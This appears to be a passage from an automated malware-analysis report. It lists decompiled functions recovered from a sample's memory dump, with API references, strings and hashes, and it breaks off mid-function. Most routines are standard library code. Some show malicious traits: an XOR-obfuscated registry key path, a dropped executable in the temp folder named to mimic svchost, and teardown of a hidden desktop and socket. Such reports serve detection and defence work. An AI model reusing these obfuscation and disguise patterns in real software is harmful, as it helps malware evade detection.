								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E00E964B8( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E00E964B8(_t285);
						goto L31;
					}
				} else {
					_t220 = E00E95BBD();
					_t299 = 0x16;
					 *_t220 = _t299;
					E00E928EC();
					L31:
					return _t299;
				}
				L81:
			}

0x00e999f8
0x00e999fb
0x00e99a01
0x00e99a17
0x00e99a1b
0x00e99a1e
0x00e99a20
0x00e99a22
0x00e99a24
0x00e99a26
0x00e99a29
0x00e99a2c
0x00e99a2f
0x00e99a31
0x00e99a94
0x00e99a96
0x00e99a99
0x00e99a9b
0x00e99a9f
0x00e99aa8
0x00e99aa9
0x00e99aac
0x00e99aae
0x00e99ab1
0x00e99ab5
0x00e99ab5
0x00e99ab7
0x00e99ab9
0x00e99abb
0x00e99abd
0x00e99abd
0x00e99abf
0x00e99ac2
0x00e99ac5
0x00e99ac5
0x00e99ac7
0x00e99ac8
0x00e99ac8
0x00e99ad3
0x00e99ad5
0x00e99ad8
0x00e99ad9
0x00e99adc
0x00e99adc
0x00e99ae0
0x00e99ae3
0x00e99ae6
0x00e99ae6
0x00e99ae6
0x00e99af3
0x00e99af5
0x00e99af8
0x00e99afa
0x00e99b12
0x00e99b15
0x00e99b18
0x00e99b1a
0x00e99b1d
0x00e99b1f
0x00e99b22
0x00e99b25
0x00e99b82
0x00e99b85
0x00e99b88
0x00e99b8a
0x00000000
0x00e99b27
0x00e99b29
0x00e99b29
0x00e99b2b
0x00e99b2e
0x00e99b2e
0x00e99b30
0x00e99b32
0x00e99b38
0x00e99b3b
0x00e99b3b
0x00e99b3d
0x00e99b3e
0x00e99b3e
0x00e99b45
0x00e99b48
0x00e99b4c
0x00e99b59
0x00e99b5e
0x00e99b61
0x00e99b63
0x00e99bd9
0x00e99bda
0x00e99bdb
0x00e99bdc
0x00e99bdd
0x00e99bde
0x00e99be3
0x00e99be7
0x00e99be9
0x00e99bea
0x00e99bed
0x00e99bed
0x00e99bf0
0x00e99bf0
0x00e99bf2
0x00e99bf3
0x00e99bf3
0x00e99bf7
0x00e99bf8
0x00e99bff
0x00e99c02
0x00e99c05
0x00e99c07
0x00e99c11
0x00e99c12
0x00e99c13
0x00e99c16
0x00e99c20
0x00e99c24
0x00e99c26
0x00e99c3a
0x00e99c3a
0x00e99c3d
0x00e99c47
0x00e99c4c
0x00e99c4f
0x00e99c51
0x00000000
0x00e99c53
0x00e99c53
0x00e99c58
0x00e99c5f
0x00e99c62
0x00e99c64
0x00e99c75
0x00e99c77
0x00e99c79
0x00e99c79
0x00e99c79
0x00e99c66
0x00e99c67
0x00e99c6c
0x00e99c6f
0x00e99c7e
0x00e99c84
0x00000000
0x00e99c87
0x00e99c28
0x00e99c28
0x00e99c2e
0x00e99c33
0x00e99c36
0x00e99c38
0x00e99c8a
0x00e99c8c
0x00e99c8d
0x00e99c8e
0x00e99c8f
0x00e99c90
0x00e99c91
0x00e99c96
0x00e99c99
0x00e99c9a
0x00e99c9c
0x00e99ca2
0x00e99ca9
0x00e99cac
0x00e99caf
0x00e99cb2
0x00e99cb3
0x00e99cb4
0x00e99cb7
0x00e99cbd
0x00e99cbf
0x00e99cc1
0x00e99cc1
0x00e99cc3
0x00e99cc5
0x00000000
0x00000000
0x00e99cc7
0x00e99cc9
0x00e99ccb
0x00e99ccd
0x00e99cd8
0x00e99cda
0x00e99cdc
0x00000000
0x00000000
0x00e99cdc
0x00e99ccd
0x00000000
0x00e99cc9
0x00e99cde
0x00e99cde
0x00e99ce4
0x00e99ce6
0x00e99cec
0x00e99cee
0x00e99d10
0x00e99d10
0x00e99d12
0x00e99d14
0x00e99d20
0x00e99d20
0x00e99d16
0x00e99d16
0x00e99d18
0x00000000
0x00e99d1a
0x00e99d1a
0x00e99d1c
0x00e99d1e
0x00000000
0x00000000
0x00e99d1e
0x00e99d18
0x00e99d28
0x00e99d30
0x00e99d36
0x00e99d37
0x00e99d39
0x00e99d41
0x00e99d47
0x00e99d4d
0x00e99d53
0x00e99d67
0x00e99d6c
0x00e99d77
0x00e99d87
0x00e99d8d
0x00e99d8f
0x00e99d92
0x00e99db5
0x00e99db5
0x00e99dba
0x00e99dc0
0x00e99dc0
0x00e99dc6
0x00e99dcc
0x00e99dd2
0x00e99dd8
0x00e99dde
0x00e99dff
0x00e99e04
0x00e99e09
0x00e99e0d
0x00e99e13
0x00e99e16
0x00e99e29
0x00e99e29
0x00e99e2f
0x00e99e35
0x00e99e36
0x00e99e37
0x00e99e3c
0x00e99e3f
0x00e99e45
0x00e99e47
0x00e99ea5
0x00e99eab
0x00e99eb3
0x00e99eb8
0x00e99ebe
0x00e99ebf
0x00000000
0x00000000
0x00000000
0x00e99e18
0x00e99e18
0x00e99e1b
0x00e99e1d
0x00000000
0x00e99e1f
0x00e99e1f
0x00e99e22
0x00000000
0x00e99e24
0x00e99e24
0x00e99e27
0x00000000
0x00000000
0x00000000
0x00000000
0x00e99e27
0x00e99e22
0x00e99e1d
0x00e99ec1
0x00e99ec2
0x00000000
0x00e99e49
0x00e99e49
0x00e99e4f
0x00e99e57
0x00e99e5c
0x00e99e6b
0x00e99e6b
0x00e99e73
0x00e99e79
0x00e99e7f
0x00e99e86
0x00e99e89
0x00e99e8b
0x00e99e9b
0x00e99ea0
0x00000000
0x00e99d94
0x00e99d94
0x00e99d9a
0x00e99d9b
0x00e99d9c
0x00e99d9d
0x00e99da5
0x00e99da5
0x00e99ec8
0x00e99ec8
0x00e99ed0
0x00e99ed8
0x00e99edd
0x00e99cf0
0x00e99cf3
0x00e99cf5
0x00e99d0a
0x00000000
0x00e99cf7
0x00e99cf7
0x00e99cfa
0x00e99cfb
0x00e99cfc
0x00e99cfd
0x00e99d02
0x00e99cf5
0x00e99ee4
0x00e99eef
0x00000000
0x00000000
0x00000000
0x00e99c38
0x00e99c09
0x00e99c0b
0x00e99c0c
0x00e99c10
0x00e99c10
0x00000000
0x00000000
0x00000000
0x00000000
0x00e99b65
0x00e99b65
0x00e99b6b
0x00e99b6e
0x00e99b71
0x00e99b74
0x00e99b77
0x00e99b7a
0x00e99b7d
0x00e99b7d
0x00000000
0x00e99b2e
0x00e99afc
0x00e99afc
0x00e99aff
0x00e99b8c
0x00e99b8d
0x00e99b92
0x00000000
0x00e99b92
0x00e99a33
0x00e99a33
0x00e99a36
0x00e99a3e
0x00e99a41
0x00e99a48
0x00e99a4a
0x00e99a4c
0x00e99a67
0x00e99a68
0x00e99a69
0x00e99a6a
0x00e99a6f
0x00e99a72
0x00e99a75
0x00e99a4e
0x00e99a4e
0x00e99a51
0x00e99a52
0x00e99a53
0x00e99a54
0x00e99a55
0x00e99a5a
0x00e99a5c
0x00e99a5f
0x00e99a5f
0x00e99a77
0x00e99a79
0x00000000
0x00000000
0x00e99a82
0x00e99a85
0x00e99a88
0x00e99a8a
0x00e99a8c
0x00000000
0x00e99a8e
0x00e99a8e
0x00e99a91
0x00000000
0x00e99a91
0x00000000
0x00e99a8c
0x00e99b07
0x00e99b93
0x00e99b96
0x00e99b9a
0x00e99ba3
0x00e99ba6
0x00e99baa
0x00e99baa
0x00e99bac
0x00e99baf
0x00e99bb1
0x00e99bb3
0x00e99bb5
0x00e99bba
0x00e99bbb
0x00e99bbf
0x00e99bbf
0x00e99bc3
0x00e99bc6
0x00e99bc6
0x00e99bca
0x00000000
0x00e99bd1
0x00e99a03
0x00e99a03
0x00e99a0a
0x00e99a0b
0x00e99a0d
0x00e99bd2
0x00e99bd8
0x00e99bd8
0x00000000

APIs

_free.LIBCMT ref: 00E99B8D

Strings

*?, xrefs: 00E99A36
F8A/, xrefs: 00E99CA2

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?$F8A/
API String ID: 269201875-231242991
Opcode ID: 0d5a5e22b0f69a5a5a5bed634af0ec803172b9249a64b7b1366dc73868074099
Instruction ID: a1b01c0558bf1fb3a34890d6e539f33eb1bedef2f839268a4ca7a1944b783387
Opcode Fuzzy Hash: 0d5a5e22b0f69a5a5a5bed634af0ec803172b9249a64b7b1366dc73868074099
Instruction Fuzzy Hash: 836137B5E002199FDF14CFA8D8815EDBBF9EF48314B24916AE814F7301E675AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00E99FBE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E99FBE(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _t14;
				void* _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					if( *_t38 != 0) {
						_t14 = E00E9A975(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						if(_t14 != 0) {
							_t36 = _a8;
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00E9A975(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								if(_t15 != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
								} else {
									E00E95B87(GetLastError());
									_t17 =  *((intOrPtr*)(E00E95BBD()));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00E95FB4(_t36, _t14);
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00E95B87(GetLastError());
						_t17 =  *((intOrPtr*)(E00E95BBD()));
						goto L14;
					}
					_t39 = _a8;
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00E95FB4(_t39, 1);
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00E96039(_a8);
				return 0;
			}

0x00e99fc4
0x00e99fc9
0x00e99fe0
0x00e9a012
0x00e9a01c
0x00e9a035
0x00e9a03b
0x00e9a049
0x00e9a058
0x00e9a062
0x00e9a07b
0x00e9a07e
0x00e9a064
0x00e9a06b
0x00e9a076
0x00e9a076
0x00e9a080
0x00e9a081
0x00000000
0x00e9a081
0x00e9a040
0x00e9a047
0x00000000
0x00000000
0x00000000
0x00e9a047
0x00e9a025
0x00e9a030
0x00000000
0x00e9a030
0x00e99fe2
0x00e99fe8
0x00e99ffb
0x00e99ffe
0x00e9a000
0x00e9a002
0x00000000
0x00e9a002
0x00e99fee
0x00e99ff5
0x00000000
0x00000000
0x00000000
0x00e99ff5
0x00e99fce
0x00000000

Strings

C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe, xrefs: 00E99FC3

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe
API String ID: 0-2410410132
Opcode ID: b34a5704eb0d6bb79565219674f3afba583b44dede58671842dc0c00f45677f4
Instruction ID: caa2a224efdaa8ed65f664ec15876f58c6bcc2986895a80d6a9cd04fd19ae173
Opcode Fuzzy Hash: b34a5704eb0d6bb79565219674f3afba583b44dede58671842dc0c00f45677f4
Instruction Fuzzy Hash: 4621D472604605BFDF20AF658C80DAAB7DDEF013A87145624F968F7151EB71EC4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E82861, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00E82861(void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v27;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v104;
				void* _v108;
				signed int _t25;
				void* _t33;
				void _t34;
				void _t35;
				void* _t43;
				signed int _t47;
				void* _t54;
				signed int _t55;
				intOrPtr _t57;
				void* _t58;
				void* _t65;
				signed int _t67;

				_t25 =  *0xea9014; // 0xa413846
				_v8 = _t25 ^ _t67;
				asm("movaps xmm0, [0xe7dec0]");
				_t43 = 0;
				asm("movups [ebp-0x64], xmm0");
				asm("movaps xmm0, [0xe7db00]");
				_t57 = _a4;
				asm("movups [ebp-0x54], xmm0");
				_v40 = 0xe4edeec7;
				asm("movaps xmm0, [0xe7db10]");
				asm("movups [ebp-0x44], xmm0");
				_v36 = 0xc4a6e0e8;
				asm("movaps xmm0, [0xe7dc30]");
				asm("movups [ebp-0x34], xmm0");
				_v32 = 0xe6e5fbe0;
				_v28 = 0xe9;
				do {
					_t7 = _t43 + 0x40; // 0x40
					 *(_t67 + _t43 - 0x64) =  *(_t67 + _t43 - 0x64) ^ _t7;
					_t43 = _t43 + 1;
				} while (_t43 < 0x4d);
				_v27 = 0;
				if(RegOpenKeyA(0x80000002,  &_v104,  &_v108) == 0) {
					asm("movaps xmm0, [0xe7dab0]");
					_push(_t43);
					asm("movups [ebp-0x14], xmm0");
					E00E82CCF( &_v24, _v108, E00E82D2B( &_v24), _t57);
					_v20 = 0x312a221c;
					_v16 = 0x6923282b;
					_v12 = 0x2f312d;
					_t33 = E00E827DA( &_v20);
					_t54 = _t33;
					_t65 = _t33;
					do {
						_t34 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t34 != 0);
					_t55 = _t54 - _t65;
					_t58 = _t57 - 1;
					do {
						_t35 =  *(_t58 + 1);
						_t58 = _t58 + 1;
					} while (_t35 != 0);
					_t47 = _t55 >> 2;
					memcpy(_t58, _t65, _t47 << 2);
					memcpy(_t65 + _t47 + _t47, _t65, _t55 & 0x00000003);
					RegCloseKey(_v108);
				} else {
				}
				return E00E8AE43(_v8 ^ _t67);
			}

0x00e82867
0x00e8286e
0x00e82871
0x00e82878
0x00e8287a
0x00e8287f
0x00e82886
0x00e82889
0x00e8288d
0x00e82894
0x00e8289b
0x00e8289f
0x00e828a6
0x00e828ad
0x00e828b1
0x00e828b8
0x00e828be
0x00e828be
0x00e828c1
0x00e828c5
0x00e828c6
0x00e828ce
0x00e828e4
0x00e828ea
0x00e828f2
0x00e828f7
0x00e82904
0x00e8290c
0x00e82913
0x00e8291a
0x00e82921
0x00e82926
0x00e82928
0x00e8292a
0x00e8292a
0x00e8292c
0x00e8292d
0x00e82931
0x00e82933
0x00e82934
0x00e82934
0x00e82937
0x00e82938
0x00e82941
0x00e82944
0x00e8294b
0x00e8294d
0x00e828e6
0x00e828e6
0x00e82963

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00E828DC

Part of subcall function 00E82CCF: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00E82909,?,00000000,?), ref: 00E82CEB

RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00E8294D

Strings

-1/, xrefs: 00E8291A
F8A/, xrefs: 00E82867
+(#i, xrefs: 00E82913

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: +(#i$-1/$F8A/
API String ID: 3677997916-3846297524
Opcode ID: cb909b26e67162f2308e234e210c2373144e5b78748ba64e2acba812a12c8221
Instruction ID: e1d8d3c6a89ea08338e81050d9c4a4a2f8fad12f1252bf2a7a2ca209ba51d57b
Opcode Fuzzy Hash: cb909b26e67162f2308e234e210c2373144e5b78748ba64e2acba812a12c8221
Instruction Fuzzy Hash: F431DE70D042499EDB06DFA89D116FEFBB4FF69308F11621CD94976121EB306A8AC760

Uniqueness

Uniqueness Score: -1.00%

Function 00E92E5E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00E92E5E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0xea72b4(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00e92e64
0x00e92e68
0x00e92e73
0x00e92e7b
0x00e92e86
0x00e92e8c
0x00e92e90
0x00e92e97
0x00e92e9d
0x00e92e9d
0x00e92e9f
0x00e92ea4
0x00000000
0x00e92ea9
0x00e92eb2

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00E92E53,?,?,00E92E1B,00000001,00000000,?), ref: 00E92E73
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E92E86
FreeLibrary.KERNEL32(00000000,?,?,00E92E53,?,?,00E92E1B,00000001,00000000,?), ref: 00E92EA9

Strings

mscoree.dll, xrefs: 00E92E6C
CorExitProcess, xrefs: 00E92E7E

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4c94a6a980162edd3596725cd085c86c440431152167890713f76e579e1039c9
Instruction ID: c6aa1e0a0ae4c187fc2c01ca44974794a550a7ce103fe490fdbe5a70c1fecbf6
Opcode Fuzzy Hash: 4c94a6a980162edd3596725cd085c86c440431152167890713f76e579e1039c9
Instruction Fuzzy Hash: 5CF0A771506318FFDF12DB91DE09B9EBBB8EB45716F104094FD08B21A0DB715E04DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00E97229, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E97229(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E00E95B87(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E00E95BBD();
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(_t21 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t21;
			}

0x00e97229
0x00e97235
0x00e97247
0x00e97249
0x00e97250
0x00e972a5
0x00000000
0x00e972a5
0x00e97258
0x00e97262
0x00e97268
0x00e9726b
0x00e9726e
0x00e97274
0x00e97276
0x00000000
0x00000000
0x00e97278
0x00e9727b
0x00e9727e
0x00e97280
0x00e97289
0x00e97289
0x00e97294
0x00e9729a
0x00e9729f
0x00000000
0x00e9729f
0x00e97282
0x00e97287
0x00000000
0x00000000
0x00e97287
0x00e972ac

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00E9723F
GetLastError.KERNEL32(?,?,?), ref: 00E97249
__dosmaperr.LIBCMT ref: 00E97250
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 00E9726E
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00E97294

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: d771cc9bd06e5b40a97227a8c52edeb32e0239a6f03144b69db9375cc6aabab7
Instruction ID: 07788ae4dbe697d5c8c0efc86114bc44e3fb6f5cbfca9492ac65cd8982f0d32f
Opcode Fuzzy Hash: d771cc9bd06e5b40a97227a8c52edeb32e0239a6f03144b69db9375cc6aabab7
Instruction Fuzzy Hash: 33016DB2925118BFDF119FA6CC08DEF7FB9EF05760F005255F8A4A21A0D7319944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9B726, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E9B726(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xea90c0; // 0xea9114
					if(_t23 != 0) {
						E00E964B8(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xea90c4; // 0xeaa6b4
					if(_t24 != 0) {
						E00E964B8(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xea90c8; // 0xeaa6b4
					if(_t25 != 0) {
						E00E964B8(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xea90f0; // 0xea9118
					if(_t26 != 0) {
						E00E964B8(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xea90f4; // 0xeaa6b8
					if(_t27 != 0) {
						return E00E964B8(_t6);
					}
				}
				return _t6;
			}

0x00e9b72c
0x00e9b731
0x00e9b735
0x00e9b73b
0x00e9b73e
0x00e9b743
0x00e9b747
0x00e9b74d
0x00e9b750
0x00e9b755
0x00e9b759
0x00e9b75f
0x00e9b762
0x00e9b767
0x00e9b76b
0x00e9b771
0x00e9b774
0x00e9b779
0x00e9b77a
0x00e9b77d
0x00e9b783
0x00000000
0x00e9b78b
0x00e9b783
0x00e9b78e

APIs

_free.LIBCMT ref: 00E9B73E

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E9B750
_free.LIBCMT ref: 00E9B762
_free.LIBCMT ref: 00E9B774
_free.LIBCMT ref: 00E9B786

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bdb1e5ac67a9995346b0f993607ca1706948f864470a7577b614d26d54f0c49e
Instruction ID: 92869f74e24d19d086cdc6653818a7a08960783d4a7990b1938c113846f17fbe
Opcode Fuzzy Hash: bdb1e5ac67a9995346b0f993607ca1706948f864470a7577b614d26d54f0c49e
Instruction Fuzzy Hash: 50F04F32500604AF8E20EBB9FAC5C0A7BEDBB443543946A07F418F7601CB24FC808665

Uniqueness

Uniqueness Score: -1.00%

Function 00E862A9, Relevance: 7.5, APIs: 5, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E862A9() {
				int _t4;

				TerminateThread( *0xeaae34, 0);
				TerminateThread( *0xeaae30, 0);
				CloseDesktop( *0xeaae3c);
				_t4 = CloseHandle( *0xeaae34);
				 *0xeaae74 = 0;
				 *0xeaae88 = 0;
				 *0xeaae80 = 0;
				 *0xeaae8c = 0;
				__imp__#3( *0xeaae40);
				 *0xeaae3c = 0;
				 *0xeaae40 = 0;
				return _t4;
			}

0x00e862b3
0x00e862c0
0x00e862cc
0x00e862d8
0x00e862e4
0x00e862ea
0x00e862f0
0x00e862f6
0x00e862fc
0x00e86302
0x00e86308
0x00e8630f

APIs

TerminateThread.KERNEL32(00000000,00000000,00E86157), ref: 00E862B3
TerminateThread.KERNEL32(00000000), ref: 00E862C0
CloseDesktop.USER32 ref: 00E862CC
CloseHandle.KERNEL32 ref: 00E862D8
closesocket.WS2_32 ref: 00E862FC

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseTerminateThread$DesktopHandleclosesocket
String ID:
API String ID: 2795373509-0
Opcode ID: c52d991a5ce752a54720f6e7f2d426b6042b86d095e97c510d448e2356653cef
Instruction ID: c50ba1b6bf2dee29a911853951ba4c0839a1e9ec20ad2aef63dcd21fcb02d3b1
Opcode Fuzzy Hash: c52d991a5ce752a54720f6e7f2d426b6042b86d095e97c510d448e2356653cef
Instruction Fuzzy Hash: 96F0FA755052409FC7529F57FD08855BFAAFBEF701308812AE541A1130C7B66899EF22

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2D07, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 245
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00EA2D07(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t55;
				int _t62;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t69;
				void* _t72;
				signed int _t73;
				signed int _t74;
				intOrPtr* _t79;
				char* _t80;
				char* _t81;
				intOrPtr _t87;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr* _t109;
				intOrPtr* _t110;
				intOrPtr _t112;
				intOrPtr* _t114;
				intOrPtr* _t115;
				signed int _t116;
				void* _t117;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;

				_t55 =  *0xea9014; // 0xa413846
				_v8 = _t55 ^ _t116;
				_t112 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
